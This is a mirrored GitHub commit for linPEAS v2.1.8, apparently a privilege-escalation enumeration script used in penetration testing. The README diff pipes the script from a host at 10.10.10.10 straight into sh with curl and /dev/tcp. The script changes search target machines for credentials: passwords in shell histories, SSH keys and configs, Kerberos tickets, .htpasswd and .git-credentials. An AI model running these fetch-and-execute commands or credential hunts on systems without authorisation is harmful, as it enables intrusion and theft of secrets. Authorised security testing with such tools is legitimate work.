1
mirror of https://github.com/carlospolop/PEASS-ng synced 2025-02-21 10:30:58 +01:00

linPEASv2.1.8

This commit is contained in:
carlospolop 2019-11-17 19:23:23 -05:00
parent 1e08eeddeb
commit cc58cd96eb
2 changed files with 28 additions and 14 deletions

@ -21,7 +21,7 @@ python -m SimpleHTTPServer 80
curl 10.10.10.10/linpeas.sh | sh
#Without curl
nc -lvnp 80 < linpeas.sh
nc -q 5 -lvnp 80 < linpeas.sh
cat < /dev/tcp/10.10.10.10/80 | sh
```

@ -1,6 +1,6 @@
#!/bin/sh
VERSION="v2.1.7"
VERSION="v2.1.8"
###########################################
#---------------) Colors (----------------#
@ -122,7 +122,7 @@ USER=`whoami`
HOME=/home/$USER
GROUPS="ImPoSSssSiBlEee"`groups $USER 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|' | sed 's/|/\\\|/g'`
pwd_inside_history="PASSW\|passw\|root\|sudo\|^su\|pkexec\|^ftp\|mongo\|psql\|mysql\|rdekstop\|xfreerdp\|^ssh\|@"
pwd_inside_history="7z\|unzip\|PASSW\|passw\|root\|sudo\|^su\|pkexec\|^ftp\|mongo\|psql\|mysql\|rdesktop\|xfreerdp\|^ssh\|@"
WF=`find /home /tmp /var /bin /etc /usr /lib /media /mnt /opt /root /dev -type d -maxdepth 2 '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | sort`
file=""
@ -1081,6 +1081,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
certsbin=`find /home /usr /root /etc /opt /var /mnt \( -name "*.csr" -o -name "*.der" \) 2>/dev/null | grep -v "/usr/share/\|/etc/ssl/"`
clientcert=`find /home /usr /root /etc /opt /var /mnt \( -name "*.pfx" -o -name "*.p12" \) 2>/dev/null | grep -v "/usr/share/\|/etc/ssl/"`
sshagents=`find /tmp -name "agent*" 2>/dev/null`
homesshconfig=`find /home /root -name config 2>/dev/null | grep "ssh"`
if [ "$ssh" ]; then
printf "$ssh\n"
@ -1095,18 +1096,23 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
printf "Private SSH keys found!:\n$privatekeyfilesgrep\n" | sed "s,.*,${C}[1;31m&${C}[0m,"
fi
if [ "$certsb4_grep" ] || [ "$certsbin" ]; then
echo " -- Some certificates were found:"
echo " --> Some certificates were found:"
printf "$certsb4_grep\n"
printf "$certsbin\n"
fi
if [ "$clientcert" ]; then
echo " -- Some client certificates were found:"
echo " --> Some client certificates were found:"
printf "$clientcert\n"
fi
if [ "$sshagents" ]; then
echo " -- Some SSH Agents were found:"
echo " --> Some SSH Agents were found:"
printf "$sshagents\n"
fi
if [ "$homesshconfig" ]; then
echo " --> Some home ssh config file was found"
printf "$homesshconfig\n"
for f in $homesshconfig; do cat $f 2>/dev/null sed "s,User\|ProxyCommand,${C}[1;31m&${C}[0m,"; done
fi
echo ""
##-- 23SI) PAM auth
@ -1143,6 +1149,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then
else echo_not_found "krb5.conf"
fi
ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
klist 2>/dev/null || echo_not_found "klist"
echo ""
##-- 27SI) kibana
@ -1330,13 +1337,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- 14IF) Backup files
printf $Y"[+] "$GREEN"Backup files?\n"$NC
backs=`find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null`
for b in $backs; do if [ -r $b ]; then ls -l $b | grep -v $notBackup | sed "s,backup\|bck\|\.bak,${C}[1;31m&${C}[0m,g"; fi; done
backs=`find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" -o -name "*\.old" \) 2>/dev/null`
for b in $backs; do if [ -r $b ]; then ls -l $b | grep -v $notBackup | sed "s,backup\|bck\|\.bak\|\.old,${C}[1;31m&${C}[0m,g"; fi; done
echo ""
##-- 15IF) DB files
printf $Y"[+] "$GREEN"Looking for readable .db files\n"$NC
dbfiles=`find /var /etc /home /root /tmp /usr /opt -type f -name "*.db" 2>/dev/null`
printf $Y"[+] "$GREEN"Looking for readable .db files (limit 100)\n"$NC
dbfiles=`find /var /etc /home /root /tmp /usr /opt -type f -name "*.db" 2>/dev/null | head -n 100`
for f in $dbfiles; do if [ -r $f ]; then echo $f; fi; done
echo ""
@ -1351,15 +1358,22 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
##-- 17IF) Interesting hidden files
printf $Y"[+] "$GREEN"*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml\n"$NC
printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data\n"$NC
fils=`find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`
fils=`find /var /etc /home /root /tmp /usr /opt /mnt -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "*httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null`
for f in $fils; do
if [ -r $f ]; then
ls -l $f 2>/dev/null | sed "s,bash_history\|\.sudo_as_admin_successful\|\.plan\|\.htpasswd\|\.git-credentials\|\.rhosts\|,${C}[1;31m&${C}[0m," | sed "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g";
g=`echo $f | grep "_history"`
if [ $g ]; then
ls -l $f 2>/dev/null | sed "s,bash_history\|\.sudo_as_admin_successful\|\.plan\|\.htpasswd\|\.git-credentials\|\.rhosts\|httpd.conf,${C}[1;31m&${C}[0m," | sed "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m,g";
if [ `echo $f | grep "_history"` ]; then
printf $GREEN"Looking for possible passwords inside $f\n"$NC
cat $f | grep $pwd_inside_history | sed "s,$pwd_inside_history,${C}[1;31m&${C}[0m,"
echo ""
elif [ `echo $f | grep "httpd.conf" ` ]; then
printf $GREEN"Reading $f\n"$NC
cat $f | sed "s,htaccess.*\|htpasswd.*,${C}[1;31m&${C}[0m,"
echo ""
elif [ `echo $f | grep "htpasswd" ` ]; then
printf $GREEN"Reading $f\n"$NC
cat $f | sed "s,.*,${C}[1;31m&${C}[0m,"
echo ""
fi;
fi;
done